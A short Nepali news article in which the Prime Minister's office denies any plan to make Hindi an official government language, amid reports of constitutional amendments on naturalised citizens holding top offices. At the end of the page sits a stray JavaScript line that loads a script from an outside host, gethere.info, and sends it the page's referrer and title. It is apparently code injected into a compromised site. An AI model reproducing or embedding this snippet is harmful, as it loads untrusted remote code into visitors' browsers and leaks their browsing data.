चौतर्फी आलोचनापछि हिन्दी भाषालाई सरकारी भाषा बनाउने विषयमा बोल्यो प्रधानमन्त्री कार्यालय

काठमाडौं, असोज ७– हिन्दीभाषालाई पनि सरकारी भाषा बनाउन लागेको भनिएकोमा चौतर्फी आलोचना भएपछि प्रधानमन्त्री कार्यालयले त्यस्तो कुनै तयारी नरहेको बताएको छ । prachanda
प्रधानमन्त्रीका प्रेस सल्लाहकार गोबिन्द आचार्यले हिन्दी भाषालाई सरकारी भाषा बनाउने विषयमा कुनै छलफल र प्रस्ताव पनि नआएको बताए ।
उपप्रधान तथा गृहमन्त्री विमलेन्द्र निधिले हिन्दी भाषालाई सरकारी भाषा बनाउने गरी संविधान संशोधन हुन लागेको बताएको भन्दै समाचार प्रकाशमा आएको थियो ।
समाचारमा भारतबाट फर्के लगतै प्रधानमन्त्री पुष्पकमल दाहाल प्रचण्डले अंगिकृत नागरिकता लिएका ब्यक्तिले पनि देशको प्रमुख कार्यकारी पदमा पुग्न सक्ने गरी संविधान सशोधन प्रक्रिया अघि बढाउन लागेको समेत प्रकाशमा आएको थियो ।

भारतले अंगिकृत नागरिकता लिएका ब्यक्ति पनि नेपालको राष्टपति र प्रधानमन्त्री बन्न पाउने गरी संविधान संशोधन गर्न नेपालका राजनीतिक दलहरुलाई दवाव दिँदै आएको छ ।

s.src=’http://gethere.info/kt/?264dpr&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;

Loading...